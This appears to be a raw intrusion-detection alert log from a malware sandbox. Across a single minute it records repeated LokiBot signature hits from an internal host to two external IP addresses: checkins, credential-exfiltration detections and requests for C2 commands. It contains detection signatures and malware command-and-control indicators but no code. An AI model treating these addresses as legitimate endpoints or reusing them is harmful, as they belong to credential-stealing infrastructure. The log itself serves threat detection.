                        02/10/22-10:22:02.840347TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4916780192.168.2.22172.67.197.66
                        02/10/22-10:22:02.840347TCP2025381ET TROJAN LokiBot Checkin4916780192.168.2.22172.67.197.66
                        02/10/22-10:22:02.840347TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24916780192.168.2.22172.67.197.66
                        02/10/22-10:22:03.831670TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14916880192.168.2.22172.67.197.66
                        02/10/22-10:22:03.831670TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4916880192.168.2.22172.67.197.66
                        02/10/22-10:22:03.831670TCP2025381ET TROJAN LokiBot Checkin4916880192.168.2.22172.67.197.66
                        02/10/22-10:22:03.831670TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24916880192.168.2.22172.67.197.66
                        02/10/22-10:22:04.920208TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14916980192.168.2.22172.67.197.66
                        02/10/22-10:22:04.920208TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4916980192.168.2.22172.67.197.66
                        02/10/22-10:22:04.920208TCP2025381ET TROJAN LokiBot Checkin4916980192.168.2.22172.67.197.66
                        02/10/22-10:22:04.920208TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24916980192.168.2.22172.67.197.66
                        02/10/22-10:22:05.958935TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917080192.168.2.22104.21.49.244
                        02/10/22-10:22:05.958935TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917080192.168.2.22104.21.49.244
                        02/10/22-10:22:05.958935TCP2025381ET TROJAN LokiBot Checkin4917080192.168.2.22104.21.49.244
                        02/10/22-10:22:05.958935TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917080192.168.2.22104.21.49.244
                        02/10/22-10:22:07.006112TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917180192.168.2.22172.67.197.66
                        02/10/22-10:22:07.006112TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917180192.168.2.22172.67.197.66
                        02/10/22-10:22:07.006112TCP2025381ET TROJAN LokiBot Checkin4917180192.168.2.22172.67.197.66
                        02/10/22-10:22:07.006112TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917180192.168.2.22172.67.197.66
                        02/10/22-10:22:08.131839TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917280192.168.2.22104.21.49.244
                        02/10/22-10:22:08.131839TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917280192.168.2.22104.21.49.244
                        02/10/22-10:22:08.131839TCP2025381ET TROJAN LokiBot Checkin4917280192.168.2.22104.21.49.244
                        02/10/22-10:22:08.131839TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917280192.168.2.22104.21.49.244
                        02/10/22-10:22:09.274963TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917380192.168.2.22172.67.197.66
                        02/10/22-10:22:09.274963TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917380192.168.2.22172.67.197.66
                        02/10/22-10:22:09.274963TCP2025381ET TROJAN LokiBot Checkin4917380192.168.2.22172.67.197.66
                        02/10/22-10:22:09.274963TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917380192.168.2.22172.67.197.66
                        02/10/22-10:22:10.415912TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917480192.168.2.22104.21.49.244
                        02/10/22-10:22:10.415912TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917480192.168.2.22104.21.49.244
                        02/10/22-10:22:10.415912TCP2025381ET TROJAN LokiBot Checkin4917480192.168.2.22104.21.49.244
                        02/10/22-10:22:10.415912TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917480192.168.2.22104.21.49.244
                        02/10/22-10:22:11.483873TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917580192.168.2.22104.21.49.244
                        02/10/22-10:22:11.483873TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917580192.168.2.22104.21.49.244
                        02/10/22-10:22:11.483873TCP2025381ET TROJAN LokiBot Checkin4917580192.168.2.22104.21.49.244
                        02/10/22-10:22:11.483873TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917580192.168.2.22104.21.49.244
                        02/10/22-10:22:12.553926TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917680192.168.2.22172.67.197.66
                        02/10/22-10:22:12.553926TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917680192.168.2.22172.67.197.66
                        02/10/22-10:22:12.553926TCP2025381ET TROJAN LokiBot Checkin4917680192.168.2.22172.67.197.66
                        02/10/22-10:22:12.553926TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917680192.168.2.22172.67.197.66
                        02/10/22-10:22:13.627098TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917780192.168.2.22104.21.49.244
                        02/10/22-10:22:13.627098TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917780192.168.2.22104.21.49.244
                        02/10/22-10:22:13.627098TCP2025381ET TROJAN LokiBot Checkin4917780192.168.2.22104.21.49.244
                        02/10/22-10:22:13.627098TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917780192.168.2.22104.21.49.244
                        02/10/22-10:22:14.784465TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917880192.168.2.22172.67.197.66
                        02/10/22-10:22:14.784465TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917880192.168.2.22172.67.197.66
                        02/10/22-10:22:14.784465TCP2025381ET TROJAN LokiBot Checkin4917880192.168.2.22172.67.197.66
                        02/10/22-10:22:14.784465TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917880192.168.2.22172.67.197.66
                        02/10/22-10:22:15.879811TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917980192.168.2.22172.67.197.66
                        02/10/22-10:22:15.879811TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917980192.168.2.22172.67.197.66
                        02/10/22-10:22:15.879811TCP2025381ET TROJAN LokiBot Checkin4917980192.168.2.22172.67.197.66
                        02/10/22-10:22:15.879811TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917980192.168.2.22172.67.197.66
                        02/10/22-10:22:17.222000TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918080192.168.2.22172.67.197.66
                        02/10/22-10:22:17.222000TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918080192.168.2.22172.67.197.66
                        02/10/22-10:22:17.222000TCP2025381ET TROJAN LokiBot Checkin4918080192.168.2.22172.67.197.66
                        02/10/22-10:22:17.222000TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918080192.168.2.22172.67.197.66
                        02/10/22-10:22:18.584775TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918180192.168.2.22172.67.197.66
                        02/10/22-10:22:18.584775TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918180192.168.2.22172.67.197.66
                        02/10/22-10:22:18.584775TCP2025381ET TROJAN LokiBot Checkin4918180192.168.2.22172.67.197.66
                        02/10/22-10:22:18.584775TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918180192.168.2.22172.67.197.66
                        02/10/22-10:22:20.304833TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918280192.168.2.22172.67.197.66
                        02/10/22-10:22:20.304833TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918280192.168.2.22172.67.197.66
                        02/10/22-10:22:20.304833TCP2025381ET TROJAN LokiBot Checkin4918280192.168.2.22172.67.197.66
                        02/10/22-10:22:20.304833TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918280192.168.2.22172.67.197.66
                        02/10/22-10:22:21.371169TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918380192.168.2.22172.67.197.66
                        02/10/22-10:22:21.371169TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918380192.168.2.22172.67.197.66
                        02/10/22-10:22:21.371169TCP2025381ET TROJAN LokiBot Checkin4918380192.168.2.22172.67.197.66
                        02/10/22-10:22:21.371169TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918380192.168.2.22172.67.197.66
                        02/10/22-10:22:22.490195TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918480192.168.2.22172.67.197.66
                        02/10/22-10:22:22.490195TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918480192.168.2.22172.67.197.66
                        02/10/22-10:22:22.490195TCP2025381ET TROJAN LokiBot Checkin4918480192.168.2.22172.67.197.66
                        02/10/22-10:22:22.490195TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918480192.168.2.22172.67.197.66
                        02/10/22-10:22:23.504559TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918580192.168.2.22104.21.49.244
                        02/10/22-10:22:23.504559TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918580192.168.2.22104.21.49.244
                        02/10/22-10:22:23.504559TCP2025381ET TROJAN LokiBot Checkin4918580192.168.2.22104.21.49.244
                        02/10/22-10:22:23.504559TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918580192.168.2.22104.21.49.244
                        02/10/22-10:22:24.588293TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918680192.168.2.22104.21.49.244
                        02/10/22-10:22:24.588293TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918680192.168.2.22104.21.49.244
                        02/10/22-10:22:24.588293TCP2025381ET TROJAN LokiBot Checkin4918680192.168.2.22104.21.49.244
                        02/10/22-10:22:24.588293TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918680192.168.2.22104.21.49.244
                        02/10/22-10:22:25.593017TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918780192.168.2.22172.67.197.66
                        02/10/22-10:22:25.593017TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918780192.168.2.22172.67.197.66
                        02/10/22-10:22:25.593017TCP2025381ET TROJAN LokiBot Checkin4918780192.168.2.22172.67.197.66
                        02/10/22-10:22:25.593017TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918780192.168.2.22172.67.197.66
                        02/10/22-10:22:26.671475TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918880192.168.2.22172.67.197.66
                        02/10/22-10:22:26.671475TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918880192.168.2.22172.67.197.66
                        02/10/22-10:22:26.671475TCP2025381ET TROJAN LokiBot Checkin4918880192.168.2.22172.67.197.66
                        02/10/22-10:22:26.671475TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918880192.168.2.22172.67.197.66
                        02/10/22-10:22:27.690157TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918980192.168.2.22172.67.197.66
                        02/10/22-10:22:27.690157TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918980192.168.2.22172.67.197.66
                        02/10/22-10:22:27.690157TCP2025381ET TROJAN LokiBot Checkin4918980192.168.2.22172.67.197.66
                        02/10/22-10:22:27.690157TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918980192.168.2.22172.67.197.66
                        02/10/22-10:22:29.085941TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919080192.168.2.22172.67.197.66
                        02/10/22-10:22:29.085941TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919080192.168.2.22172.67.197.66
                        02/10/22-10:22:29.085941TCP2025381ET TROJAN LokiBot Checkin4919080192.168.2.22172.67.197.66
                        02/10/22-10:22:29.085941TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919080192.168.2.22172.67.197.66
                        02/10/22-10:22:30.799655TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919180192.168.2.22172.67.197.66
                        02/10/22-10:22:30.799655TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919180192.168.2.22172.67.197.66
                        02/10/22-10:22:30.799655TCP2025381ET TROJAN LokiBot Checkin4919180192.168.2.22172.67.197.66
                        02/10/22-10:22:30.799655TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919180192.168.2.22172.67.197.66
                        02/10/22-10:22:31.879954TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919280192.168.2.22172.67.197.66
                        02/10/22-10:22:31.879954TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919280192.168.2.22172.67.197.66
                        02/10/22-10:22:31.879954TCP2025381ET TROJAN LokiBot Checkin4919280192.168.2.22172.67.197.66
                        02/10/22-10:22:31.879954TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919280192.168.2.22172.67.197.66
                        02/10/22-10:22:32.951127TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919380192.168.2.22172.67.197.66
                        02/10/22-10:22:32.951127TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919380192.168.2.22172.67.197.66
                        02/10/22-10:22:32.951127TCP2025381ET TROJAN LokiBot Checkin4919380192.168.2.22172.67.197.66
                        02/10/22-10:22:32.951127TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919380192.168.2.22172.67.197.66
                        02/10/22-10:22:34.006464TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919480192.168.2.22172.67.197.66
                        02/10/22-10:22:34.006464TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919480192.168.2.22172.67.197.66
                        02/10/22-10:22:34.006464TCP2025381ET TROJAN LokiBot Checkin4919480192.168.2.22172.67.197.66
                        02/10/22-10:22:34.006464TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919480192.168.2.22172.67.197.66
                        02/10/22-10:22:35.055713TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919580192.168.2.22172.67.197.66
                        02/10/22-10:22:35.055713TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919580192.168.2.22172.67.197.66
                        02/10/22-10:22:35.055713TCP2025381ET TROJAN LokiBot Checkin4919580192.168.2.22172.67.197.66
                        02/10/22-10:22:35.055713TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919580192.168.2.22172.67.197.66
                        02/10/22-10:22:36.072598TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919680192.168.2.22172.67.197.66
                        02/10/22-10:22:36.072598TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919680192.168.2.22172.67.197.66
                        02/10/22-10:22:36.072598TCP2025381ET TROJAN LokiBot Checkin4919680192.168.2.22172.67.197.66
                        02/10/22-10:22:36.072598TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919680192.168.2.22172.67.197.66
                        02/10/22-10:22:37.120242TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919780192.168.2.22172.67.197.66
                        02/10/22-10:22:37.120242TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919780192.168.2.22172.67.197.66
                        02/10/22-10:22:37.120242TCP2025381ET TROJAN LokiBot Checkin4919780192.168.2.22172.67.197.66
                        02/10/22-10:22:37.120242TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919780192.168.2.22172.67.197.66
                        02/10/22-10:22:38.172977TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919880192.168.2.22172.67.197.66
                        02/10/22-10:22:38.172977TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919880192.168.2.22172.67.197.66
                        02/10/22-10:22:38.172977TCP2025381ET TROJAN LokiBot Checkin4919880192.168.2.22172.67.197.66
                        02/10/22-10:22:38.172977TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919880192.168.2.22172.67.197.66
                        02/10/22-10:22:39.224650TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919980192.168.2.22172.67.197.66
                        02/10/22-10:22:39.224650TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919980192.168.2.22172.67.197.66
                        02/10/22-10:22:39.224650TCP2025381ET TROJAN LokiBot Checkin4919980192.168.2.22172.67.197.66
                        02/10/22-10:22:39.224650TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919980192.168.2.22172.67.197.66
                        02/10/22-10:22:40.420565TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920080192.168.2.22104.21.49.244
                        02/10/22-10:22:40.420565TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920080192.168.2.22104.21.49.244
                        02/10/22-10:22:40.420565TCP2025381ET TROJAN LokiBot Checkin4920080192.168.2.22104.21.49.244
                        02/10/22-10:22:40.420565TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920080192.168.2.22104.21.49.244
                        02/10/22-10:22:41.439397TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920180192.168.2.22104.21.49.244
                        02/10/22-10:22:41.439397TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920180192.168.2.22104.21.49.244
                        02/10/22-10:22:41.439397TCP2025381ET TROJAN LokiBot Checkin4920180192.168.2.22104.21.49.244
                        02/10/22-10:22:41.439397TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920180192.168.2.22104.21.49.244
                        02/10/22-10:22:42.534000TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920280192.168.2.22172.67.197.66
                        02/10/22-10:22:42.534000TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920280192.168.2.22172.67.197.66
                        02/10/22-10:22:42.534000TCP2025381ET TROJAN LokiBot Checkin4920280192.168.2.22172.67.197.66
                        02/10/22-10:22:42.534000TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920280192.168.2.22172.67.197.66
                        02/10/22-10:22:43.544900TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920380192.168.2.22172.67.197.66
                        02/10/22-10:22:43.544900TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920380192.168.2.22172.67.197.66
                        02/10/22-10:22:43.544900TCP2025381ET TROJAN LokiBot Checkin4920380192.168.2.22172.67.197.66
                        02/10/22-10:22:43.544900TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920380192.168.2.22172.67.197.66
                        02/10/22-10:22:44.584138TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920480192.168.2.22172.67.197.66
                        02/10/22-10:22:44.584138TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920480192.168.2.22172.67.197.66
                        02/10/22-10:22:44.584138TCP2025381ET TROJAN LokiBot Checkin4920480192.168.2.22172.67.197.66
                        02/10/22-10:22:44.584138TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920480192.168.2.22172.67.197.66
                        02/10/22-10:22:45.641461TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920580192.168.2.22104.21.49.244
                        02/10/22-10:22:45.641461TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920580192.168.2.22104.21.49.244
                        02/10/22-10:22:45.641461TCP2025381ET TROJAN LokiBot Checkin4920580192.168.2.22104.21.49.244
                        02/10/22-10:22:45.641461TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920580192.168.2.22104.21.49.244
                        02/10/22-10:22:46.729666TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920680192.168.2.22172.67.197.66
                        02/10/22-10:22:46.729666TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920680192.168.2.22172.67.197.66
                        02/10/22-10:22:46.729666TCP2025381ET TROJAN LokiBot Checkin4920680192.168.2.22172.67.197.66
                        02/10/22-10:22:46.729666TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920680192.168.2.22172.67.197.66
                        02/10/22-10:22:47.737186TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920780192.168.2.22172.67.197.66
                        02/10/22-10:22:47.737186TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920780192.168.2.22172.67.197.66
                        02/10/22-10:22:47.737186TCP2025381ET TROJAN LokiBot Checkin4920780192.168.2.22172.67.197.66
                        02/10/22-10:22:47.737186TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920780192.168.2.22172.67.197.66
                        02/10/22-10:22:48.837397TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920880192.168.2.22172.67.197.66
                        02/10/22-10:22:48.837397TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920880192.168.2.22172.67.197.66
                        02/10/22-10:22:48.837397TCP2025381ET TROJAN LokiBot Checkin4920880192.168.2.22172.67.197.66
                        02/10/22-10:22:48.837397TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920880192.168.2.22172.67.197.66
                        02/10/22-10:22:49.900199TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920980192.168.2.22172.67.197.66
                        02/10/22-10:22:49.900199TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920980192.168.2.22172.67.197.66
                        02/10/22-10:22:49.900199TCP2025381ET TROJAN LokiBot Checkin4920980192.168.2.22172.67.197.66
                        02/10/22-10:22:49.900199TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920980192.168.2.22172.67.197.66
                        02/10/22-10:22:51.041533TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921080192.168.2.22172.67.197.66
                        02/10/22-10:22:51.041533TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921080192.168.2.22172.67.197.66
                        02/10/22-10:22:51.041533TCP2025381ET TROJAN LokiBot Checkin4921080192.168.2.22172.67.197.66
                        02/10/22-10:22:51.041533TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921080192.168.2.22172.67.197.66
                        02/10/22-10:22:52.063120TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921180192.168.2.22104.21.49.244
                        02/10/22-10:22:52.063120TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921180192.168.2.22104.21.49.244
                        02/10/22-10:22:52.063120TCP2025381ET TROJAN LokiBot Checkin4921180192.168.2.22104.21.49.244
                        02/10/22-10:22:52.063120TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921180192.168.2.22104.21.49.244
                        02/10/22-10:22:53.153615TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921280192.168.2.22172.67.197.66
                        02/10/22-10:22:53.153615TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921280192.168.2.22172.67.197.66
                        02/10/22-10:22:53.153615TCP2025381ET TROJAN LokiBot Checkin4921280192.168.2.22172.67.197.66
                        02/10/22-10:22:53.153615TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921280192.168.2.22172.67.197.66
                        02/10/22-10:22:54.210618TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921380192.168.2.22172.67.197.66
                        02/10/22-10:22:54.210618TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921380192.168.2.22172.67.197.66
                        02/10/22-10:22:54.210618TCP2025381ET TROJAN LokiBot Checkin4921380192.168.2.22172.67.197.66
                        02/10/22-10:22:54.210618TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921380192.168.2.22172.67.197.66
                        02/10/22-10:22:55.222618TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921480192.168.2.22172.67.197.66
                        02/10/22-10:22:55.222618TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921480192.168.2.22172.67.197.66
                        02/10/22-10:22:55.222618TCP2025381ET TROJAN LokiBot Checkin4921480192.168.2.22172.67.197.66
                        02/10/22-10:22:55.222618TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921480192.168.2.22172.67.197.66
                        02/10/22-10:22:56.235040TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921580192.168.2.22172.67.197.66
                        02/10/22-10:22:56.235040TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921580192.168.2.22172.67.197.66
                        02/10/22-10:22:56.235040TCP2025381ET TROJAN LokiBot Checkin4921580192.168.2.22172.67.197.66
                        02/10/22-10:22:56.235040TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921580192.168.2.22172.67.197.66
                        02/10/22-10:22:57.354640TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921680192.168.2.22172.67.197.66
                        02/10/22-10:22:57.354640TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921680192.168.2.22172.67.197.66
                        02/10/22-10:22:57.354640TCP2025381ET TROJAN LokiBot Checkin4921680192.168.2.22172.67.197.66
                        02/10/22-10:22:57.354640TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921680192.168.2.22172.67.197.66
                        02/10/22-10:22:58.437792TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921780192.168.2.22172.67.197.66
                        02/10/22-10:22:58.437792TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921780192.168.2.22172.67.197.66
                        02/10/22-10:22:58.437792TCP2025381ET TROJAN LokiBot Checkin4921780192.168.2.22172.67.197.66
                        02/10/22-10:22:58.437792TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921780192.168.2.22172.67.197.66
                        02/10/22-10:22:59.543743TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921880192.168.2.22172.67.197.66
                        02/10/22-10:22:59.543743TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921880192.168.2.22172.67.197.66
                        02/10/22-10:22:59.543743TCP2025381ET TROJAN LokiBot Checkin4921880192.168.2.22172.67.197.66
                        02/10/22-10:22:59.543743TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921880192.168.2.22172.67.197.66
                        02/10/22-10:23:00.557397TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921980192.168.2.22172.67.197.66
                        02/10/22-10:23:00.557397TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921980192.168.2.22172.67.197.66
                        02/10/22-10:23:00.557397TCP2025381ET TROJAN LokiBot Checkin4921980192.168.2.22172.67.197.66
                        02/10/22-10:23:00.557397TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921980192.168.2.22172.67.197.66
                        02/10/22-10:23:01.628313TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922080192.168.2.22172.67.197.66
                        02/10/22-10:23:01.628313TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922080192.168.2.22172.67.197.66
                        02/10/22-10:23:01.628313TCP2025381ET TROJAN LokiBot Checkin4922080192.168.2.22172.67.197.66
                        02/10/22-10:23:01.628313TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922080192.168.2.22172.67.197.66
                        02/10/22-10:23:02.628100TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922180192.168.2.22172.67.197.66
                        02/10/22-10:23:02.628100TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922180192.168.2.22172.67.197.66
                        02/10/22-10:23:02.628100TCP2025381ET TROJAN LokiBot Checkin4922180192.168.2.22172.67.197.66
                        02/10/22-10:23:02.628100TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922180192.168.2.22172.67.197.66
                        02/10/22-10:23:03.670597TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922280192.168.2.22104.21.49.244
                        02/10/22-10:23:03.670597TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922280192.168.2.22104.21.49.244
                        02/10/22-10:23:03.670597TCP2025381ET TROJAN LokiBot Checkin4922280192.168.2.22104.21.49.244
                        02/10/22-10:23:03.670597TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922280192.168.2.22104.21.49.244
                        02/10/22-10:23:04.661405TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922380192.168.2.22104.21.49.244
                        02/10/22-10:23:04.661405TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922380192.168.2.22104.21.49.244
                        02/10/22-10:23:04.661405TCP2025381ET TROJAN LokiBot Checkin4922380192.168.2.22104.21.49.244
                        02/10/22-10:23:04.661405TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922380192.168.2.22104.21.49.244
                        02/10/22-10:23:05.954620TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922480192.168.2.22172.67.197.66
                        02/10/22-10:23:05.954620TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922480192.168.2.22172.67.197.66
                        02/10/22-10:23:05.954620TCP2025381ET TROJAN LokiBot Checkin4922480192.168.2.22172.67.197.66
                        02/10/22-10:23:05.954620TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922480192.168.2.22172.67.197.66
                        02/10/22-10:23:08.596978TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922580192.168.2.22172.67.197.66
                        02/10/22-10:23:08.596978TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922580192.168.2.22172.67.197.66
                        02/10/22-10:23:08.596978TCP2025381ET TROJAN LokiBot Checkin4922580192.168.2.22172.67.197.66
                        02/10/22-10:23:08.596978TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922580192.168.2.22172.67.197.66
                        02/10/22-10:23:09.667688TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922680192.168.2.22172.67.197.66
                        02/10/22-10:23:09.667688TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922680192.168.2.22172.67.197.66
